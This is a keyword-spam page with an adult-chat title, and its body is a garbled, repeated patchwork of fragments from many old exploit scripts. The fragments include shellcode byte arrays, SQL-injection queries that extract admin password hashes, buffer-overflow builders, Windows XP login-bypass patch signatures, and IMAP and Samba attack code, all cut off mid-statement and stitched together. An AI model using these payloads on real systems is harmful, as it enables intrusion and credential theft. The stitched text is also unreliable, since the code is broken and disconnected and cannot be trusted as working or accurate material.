Seh veb camrte com

10-Jul-2016 16:06 by 10 Comments

Seh veb camrte com - Adult chat lines no membership required

8B85 28EFFFFF |MOV EAX, DWORD PTR SS:[EBP-10D8] # 00418CDE |. FF15 84004300 |CALL DWORD PTR DS:[; \lstrlen A # 00418CE5 |. # But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src)); # So, whether the command was started with a '"' or not, the stack overflow will take place immediately. WHERE (username='$membercookie')"); So, editing cookie "membercookie" you can change remote user's email. Kernel Base) Error Quit("Unable to get kernel base address.\n"); printf("Kernel base address: %x\n", Kernel Base); OSVersion Info Size = sizeof(OSVERSIONINFO); if(! \|([a-z0-9]{32})\|/"; if(preg_match($pattern,$html,$matches)) { $adminusername=$matches[1]; $adminpass=$matches[2]; echo "Admin Login:$adminusername\n" ; echo "Admin Pass :$adminpass\n"; } } else { exit ("Exploit Failed :( \n"); } } else exit("Error: Libcurl isnt installed \n"); ? */ #include unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x 2f\x73\x68\x00" "\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x 00\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"; unsigned char sledpad[] = "\x90\x90\x90"; // maximum sledpad needed unsigned char spacepad[] = "\x41\x41\x41\x41"; // indicator for fun dumps float bytes_to_float(unsigned char *bytes) { float f = 0.0f; memcpy((void *)&f, bytes, sizeof(float)); return f; } unsigned char *build_attack(size_t *attack_size, long a, int padding) { size_t float_size = sizeof(float); size_t shellcode_size = sizeof(shellcode) - 1; size_t sledpad_size = float_size - (shellcode_size % float_size); size_t pad_size = padding * (sizeof(spacepad) - 1); unsigned char *attack = NULL, *padded_shellcode = shellcode; int i,j; // allocate attack space *attack_size = shellcode_size + sledpad_size + sizeof(a) + pad_size; if (*attack_size) attack = malloc(*attack_size); if (attack == NULL) exit(1); fprintf(stderr, "sizeof(float) = %d\n", float_size); fprintf(stderr, "sledpad_size = %d\n", sledpad_size); fprintf(stderr, "pad_size = %d\n", pad_size); fprintf(stderr, "attack_size = %d\n", *attack_size); fprintf(stderr, "address = %p\n", a); // write out request space padding for (i = 0; i \n", argv[0]); fprintf(stderr, " e.g. (1 = admin by default)"; chomp($target_id= ' session_vars=YTo2Ontz Oj U6In Vu YW1l Ijtz Oj Ey Oi In IEVSU k9SIFp PTUci O3M6NDoid XB3ZCI7czoz Mjoi MDk4Zj Zi Y2Q0Nj I x ZDM3M2Nh ZGU0ZTgz Mj Yy N2I0Zj Yi O3M6Mzoid Wlk Ijtz Oj E6I j Ei O3M6NDoid Wdtd CI7czoy Oi Ir MCI7czox MDoid Wxhc3R2a XN pd CI7czox MDoi MTIw NDA0Nj Iw Ni I7czo0Oi Jwcml2Ijth Ojk6e 3M6NDoibm V3cy I7czo0Oi Ju ZXdz Ijtz Oj U6In Bvb Gxz Ijtz Oj I 6In Bv Ijtz Ojc6Im1ha Wxpbmci O3M6Mjoib WEi O3M6NToic GFn Z XMi O3M6Mjoic GEi O3M6NToid XNlcn Mi O3M6Mjoid XMi O3M6ODo ic2V0d Glu Z3Mi O3M6Mjoic2Ui O3M6NToi Zm9yd W0i O3M6Mjoi Z m8i O3M6Njoi Ymxv Y2tz Ijtz Oj I6Im Js Ijtz Ojg6Im Rvd25sb2F k Ijtz Oj I6Im Rv Ijt9f Q=='); $ua = LWP:: User Agent-status_line; } print "\n[+]Building cookie"; $query = "lalalalalala' UNION SELECT upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd, upwd,upwd,upwd,upwd,upwd FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; #fucked up query but it works :) $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd !

83C4 08 |ADD ESP,8 # # The programmer has made an extreamly stupid mistake. Since all the * values are read in as single precision floating point values, the * payload must be encoded as floats.Impact ------ Any computer that uses this Sofware will be exposed to Remote Execution Code. The exploit is using three standard files that exists in every Microsoft Office 2003 Application. Or to get privileges or any user (including system administrator) who logons to vulnerable host. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!Workaround ---------- - Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529 - Unregister using regsvr32. function Poc() { arg1 = "C:\windows\system32\netsh.exe" arg2 = "C:\windows\system32\firewall add portopening tcp 4444 Got IT" arg3 = "C:\windows\system32\" arg4 = "C:\Program Files\Microsoft Office\OFFICE11\noiseneu.txt" arg5 = "C:\Program Files\Microsoft Office\OFFICE11\noiseeng.txt" arg6 = "C:\Program Files\Microsoft Office\OFFICE11\noiseenu.txt" arg7 = "1" ctrl. This is the best allround XPSP2 technique.", "phase":[{ "sig":"8BFF558BEC83EC50A1", "pageoffset":[0x927], "patch":"B001", "patchoffset":0xa5}] }, {"name":"Win XP SP2 utilman cmd spawn", "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell.©(xakep.ru) Sub jojo buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAa A") get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbccccccc ccccccddddddddddeee" buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb") egg = buff + get_EDX + buff1 + scode Chroma. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default).# k JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk J CQk JCQk JCQk JCQk JCQk JCQk JCQ # k JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk J CQk JCQk JCQk JCQk JCQk JCQk JCQ # k JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk JCQk J CQk JCQk JCQk JCQk JCQk JCQk JCQ # k JCQk JCQk JCQk JCQk JCQk JCQk JCQk Nv S2XQk9Fgpyb EKu3E1If 4x WBc DWBe Dmcn DC2rg Yn VG+2Q3 # BG5572VAQQov6Vasmy GZmqi4dl FEk/x9Zwv0gc Dr ZXe Qk JCD6FKD6FKD6FL/4CB4Ocn LXAv Hq421 # M2i R5FFG # # # C:\work\exploits\imap # ################################################## ######################################### import socket, struct, md5, base64, sys, string, signal, getopt class Exp_Lotus: def __init__(self): self.host='127.0.0.1' self.port=143 def send_payload(host,port): payload ="\x54\x30\x30\x57\x54\x30\x30\x57" payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xf7" "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x 1f\x7b\x07\x7f" "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x 8f\x83\x17\x0b" "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x 19\xb3\x38\x19" "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\x cc\xd6\xdc\xa8" "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\x a8\x9e\xf9\x6b" "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x 7c\xc1\xc8\x0b" "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\x b9\x8c\x14\xd0" "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\x a8\xd6\x07\x50" "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x 76\x6f\xf0\x82" "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x 21\xd1\xab\xd3" "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x 91\xd1\x71\x61" "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\x a2\x7d\x28\xe8" "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x 12\xcb\x7e\xc9" "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x 8e\x44\x81\xd7" "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x 7e\x67\x92\xd0" "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x 5d\x7c\xba\xad" "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x 09\x31\xee\x7f" "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\x a6\xd3\xad\xd1" "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x 08\xb5\x07\x50" "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x 07\x08\xfc\xdf" "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80") try: s=socket.socket(socket. Workaround ---------- - Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A - Unregister using regsvr32. Remote Attacker could craft a html page and execute code in a remote system with the actual user privileges. It's possible for unprivileged user to replace service executable with the file of his choice to get full access with Local System privileges. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.", "phase":[{ "sig":"0502000010", "pageoffset":[3696], "patch":"b801000000", "patchoffset":0}] }, {"name":"Win XP SP2 msv1_0technique", "notes":"Patches the call which decides if an account requires password authentication. -- ..remember: use Oracle at your own risk ;-) -- -- Thanks to security researchers all around the world... -- -- old 1: update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user' -- new 1: update bunkerview set password='6D9FEAAB597EF01B' where name='TEST' -- -- 1 row updated. /usr/bin/perl ################################################## ############# # Bug Found By :: Deltahacking TEAM ## # Coded By Reza. Impact ------ Any computer that uses this Sofware will be exposed to Remote Execution Code. Summary ------- The Start Process method doesn't check if it's being called from the application, or malicious users. Reboot Upon reboot trojaned application will be executed with Local System account. feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $cmd=""; for ($i=3; $i'/')) {echo 'Error... You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.", "phase":[{ "sig":"8BD8F7DB1ADBFEC3", "pageoffset":[2905], "patch":"bb01000000eb0990", "patchoffset":0}] }, {"name":"Win XP SP2 Unlock", "notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed.

# TODO: # Edit $target value # Run script # CPU 100%, Memory up for 1.2 Gb per one attack session. Additonally, this module will not work when the Samba "log level" parameter is higher than "2". Expect exploits for the rest of the auction items in the next week. Remote Attacker could craft a html page and execute code in a remote system with the actual user privileges. ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (! * * /////// * * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. targets=[{ "name":"Win XP SP2 Fast User Switching Unlock", "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed.

This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. I hope this completely devalues the item so that the original finder dies of starvation. "\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x 5e\x81\x07\x8a". "\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\x ce\x79\x17\xfe". "\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x 58\x49\x38\xec". "\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x 8d\x2c\xdc\x5d". "\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\x e9\x64\xf9\x9e". "\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x 3d\x3b\xc8\xfe". "\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\x f8\x76\x14\x25". "\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\x e9\x2c\x07\xa5". "\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x 37\x95\xf0\x77". "\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x 60\x2b\xab\x26". "\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\x d0\x2b\x71\x94". "\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\x e3\x87\x28\x1d". "\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x 53\x31\x7e\x3c". "\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\x cf\xbe\x81\x22". "\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x 3f\x9d\x92\x25". "\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x 1c\x86\xba\x58". "\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x 48\xcb\xee\x8a". "\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\x e7\x29\xad\x24". "\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x 49\x4f\x07\xa5". "\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x 59\xb6\x18\x15". Summary ------- The Create Process & Create Process Ex method doesn't check if they're being called from the application, or malicious users. $c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (! Note that this vulnerability is exploitable only * when domain logon support is enabled in Samba. send_udp(inet_addr(argv[2]), samlogon, nl Offset)) fprintf(stderr, "[! Sprite; import * public class Test Xss extends flash.display. When a signature is found the patch is applied at patchoffset # bytes from the beginning of the signature.

Please see the Metasploit # Framework web site for more information on licensing and terms of use. \n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = "80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."custom.php? # # Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20 # # Tested On Windows 2003 SP1 CN # # D:\perl 192.168.226.128 143 # * OK IMAP4 Server (IMail 9.10) # 0 OK LOGIN completed # * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) # * 1 EXISTS # * 1 RECENT # * OK [UIDVALIDITY 1185337300] UIDs valid # * OK [UIDNEXT 485337302] Predicted next UID # 2 OK [READ-WRITE] SELECT completed # -------------- [BEGIN] ------------------- # ---------------- [END] ------------------ # # # D:\ # # use strict; use warnings; use IO:: Socket; #Target IP my $host = shift ; my $port = shift ; my $account = "void"; my $password = "ph4nt0m.org"; my $pad1 = "void[at]ph4nt0m.org_" x 4 . ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (! \n", num_bytes); exit (EXIT_FAILURE); } return (buf); } int main (int argc, char ** argv) { char fnbuf[MAX_PATH_LEN], *ptr, *cur, *end; int fd, wfd, found, size; struct stat fbuf; printf ("Apple MACOS X xnu \n", argv[0]); exit (EXIT_SUCCESS); } if ((fd = open (argv[1], O_RDONLY)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } snprintf (fnbuf, sizeof fnbuf, "%s-pown", argv[1]); if ((wfd = open (fnbuf, O_RDWR | O_CREAT)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } if (fstat (fd, &fbuf) n Code Slots = htonl (CSLOTS_DIFF); found = 1; } } } } } if (! name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20 as%20aid,null%20as%20time,pwd%20as%20title,null%20 as%20hometext,aid%20as%20bodytext,null%20as%20topi c,null%20as%20informant,null%20as%20notes,null%20a s%20acomm,%20null%20as%20haspoll,null%20as%20poll I D,null%20as%20score,null%20as%20ratings%20FROM%20% 60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php? )/", $result, $match)) print "\n Admin's name: " .$match[0];} else {echo "Exploit failed...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; } ? */ struct nmb_name { nstring name; char scope[64]; unsigned int name_type; }; void safe_strcpy(char *a, char *b, uint32_t size) { strcpy(b, a); } void put_name(char *dest, const char *name, int pad, unsigned int name_type) { size_t len = strlen(name); memcpy(dest, name, (len scope)); p = &buf[offset+1]; while ((p = strchr(p,'.'))) { buf[offset] = PTR_DIFF(p,&buf[offset+1]); offset += (buf[offset] + 1); p = &buf[offset+1]; } buf[offset] = strlen(&buf[offset+1]); } return(ret); } typedef struct exudp_s { unsigned char msg_type; unsigned char flags; uint16_t dgm_id; uint32_t source_ip; uint16_t source_port; uint16_t dgm_len; uint16_t p Offset; struct nmb_name source_name; struct nmb_name dest_name; } exudp; /* code */ int send_udp(int ip, char *packet, unsigned int packet Size) { int fd; struct sockaddr_in to; int len; if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) 15) { printf("[! /usr/bin/python # Windows locked screen remote firewire unlockor # Metlstorm 2k6 # Uh, private use only, not for public distro, kthx.

# # NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!! 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (! /bin/bash # PR07-37-scan if [ $# -ne 1 ] then echo "

# TODO: # Edit $target value # Run script # CPU 100%, Memory up for 1.2 Gb per one attack session. Additonally, this module will not work when the Samba "log level" parameter is higher than "2". Expect exploits for the rest of the auction items in the next week. Remote Attacker could craft a html page and execute code in a remote system with the actual user privileges. ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (! * * /////// * * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. targets=[{ "name":"Win XP SP2 Fast User Switching Unlock", "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed.

This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. I hope this completely devalues the item so that the original finder dies of starvation. "\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x 5e\x81\x07\x8a". "\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\x ce\x79\x17\xfe". "\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x 58\x49\x38\xec". "\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x 8d\x2c\xdc\x5d". "\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\x e9\x64\xf9\x9e". "\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x 3d\x3b\xc8\xfe". "\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\x f8\x76\x14\x25". "\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\x e9\x2c\x07\xa5". "\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x 37\x95\xf0\x77". "\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x 60\x2b\xab\x26". "\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\x d0\x2b\x71\x94". "\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\x e3\x87\x28\x1d". "\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x 53\x31\x7e\x3c". "\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\x cf\xbe\x81\x22". "\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x 3f\x9d\x92\x25". "\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x 1c\x86\xba\x58". "\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x 48\xcb\xee\x8a". "\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\x e7\x29\xad\x24". "\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x 49\x4f\x07\xa5". "\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x 59\xb6\x18\x15". Summary ------- The Create Process & Create Process Ex method doesn't check if they're being called from the application, or malicious users. $c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (! Note that this vulnerability is exploitable only * when domain logon support is enabled in Samba. send_udp(inet_addr(argv[2]), samlogon, nl Offset)) fprintf(stderr, "[! Sprite; import * public class Test Xss extends flash.display. When a signature is found the patch is applied at patchoffset # bytes from the beginning of the signature.

Please see the Metasploit # Framework web site for more information on licensing and terms of use. \n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = "80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."custom.php? # # Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20 # # Tested On Windows 2003 SP1 CN # # D:\perl 192.168.226.128 143 # * OK IMAP4 Server (IMail 9.10) # 0 OK LOGIN completed # * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) # * 1 EXISTS # * 1 RECENT # * OK [UIDVALIDITY 1185337300] UIDs valid # * OK [UIDNEXT 485337302] Predicted next UID # 2 OK [READ-WRITE] SELECT completed # -------------- [BEGIN] ------------------- # ---------------- [END] ------------------ # # # D:\ # # use strict; use warnings; use IO:: Socket; #Target IP my $host = shift ; my $port = shift ; my $account = "void"; my $password = "ph4nt0m.org"; my $pad1 = "void[at]ph4nt0m.org_" x 4 . ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (! \n", num_bytes); exit (EXIT_FAILURE); } return (buf); } int main (int argc, char ** argv) { char fnbuf[MAX_PATH_LEN], *ptr, *cur, *end; int fd, wfd, found, size; struct stat fbuf; printf ("Apple MACOS X xnu \n", argv[0]); exit (EXIT_SUCCESS); } if ((fd = open (argv[1], O_RDONLY)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } snprintf (fnbuf, sizeof fnbuf, "%s-pown", argv[1]); if ((wfd = open (fnbuf, O_RDWR | O_CREAT)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } if (fstat (fd, &fbuf) n Code Slots = htonl (CSLOTS_DIFF); found = 1; } } } } } if (! name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20 as%20aid,null%20as%20time,pwd%20as%20title,null%20 as%20hometext,aid%20as%20bodytext,null%20as%20topi c,null%20as%20informant,null%20as%20notes,null%20a s%20acomm,%20null%20as%20haspoll,null%20as%20poll I D,null%20as%20score,null%20as%20ratings%20FROM%20% 60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php? )/", $result, $match)) print "\n Admin's name: " .$match[0];} else {echo "Exploit failed...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; } ? */ struct nmb_name { nstring name; char scope[64]; unsigned int name_type; }; void safe_strcpy(char *a, char *b, uint32_t size) { strcpy(b, a); } void put_name(char *dest, const char *name, int pad, unsigned int name_type) { size_t len = strlen(name); memcpy(dest, name, (len scope)); p = &buf[offset+1]; while ((p = strchr(p,'.'))) { buf[offset] = PTR_DIFF(p,&buf[offset+1]); offset += (buf[offset] + 1); p = &buf[offset+1]; } buf[offset] = strlen(&buf[offset+1]); } return(ret); } typedef struct exudp_s { unsigned char msg_type; unsigned char flags; uint16_t dgm_id; uint32_t source_ip; uint16_t source_port; uint16_t dgm_len; uint16_t p Offset; struct nmb_name source_name; struct nmb_name dest_name; } exudp; /* code */ int send_udp(int ip, char *packet, unsigned int packet Size) { int fd; struct sockaddr_in to; int len; if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) 15) { printf("[! /usr/bin/python # Windows locked screen remote firewire unlockor # Metlstorm 2k6 # Uh, private use only, not for public distro, kthx.

# # NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!! 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (! /bin/bash # PR07-37-scan if [ $# -ne 1 ] then echo "[[

# TODO: # Edit $target value # Run script # CPU 100%, Memory up for 1.2 Gb per one attack session. Additonally, this module will not work when the Samba "log level" parameter is higher than "2". Expect exploits for the rest of the auction items in the next week. Remote Attacker could craft a html page and execute code in a remote system with the actual user privileges. ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (! * * /////// * * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. targets=[{ "name":"Win XP SP2 Fast User Switching Unlock", "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed.

This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. I hope this completely devalues the item so that the original finder dies of starvation. "\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x 5e\x81\x07\x8a". "\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\x ce\x79\x17\xfe". "\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x 58\x49\x38\xec". "\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x 8d\x2c\xdc\x5d". "\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\x e9\x64\xf9\x9e". "\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x 3d\x3b\xc8\xfe". "\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\x f8\x76\x14\x25". "\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\x e9\x2c\x07\xa5". "\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x 37\x95\xf0\x77". "\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x 60\x2b\xab\x26". "\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\x d0\x2b\x71\x94". "\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\x e3\x87\x28\x1d". "\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x 53\x31\x7e\x3c". "\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\x cf\xbe\x81\x22". "\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x 3f\x9d\x92\x25". "\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x 1c\x86\xba\x58". "\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x 48\xcb\xee\x8a". "\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\x e7\x29\xad\x24". "\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x 49\x4f\x07\xa5". 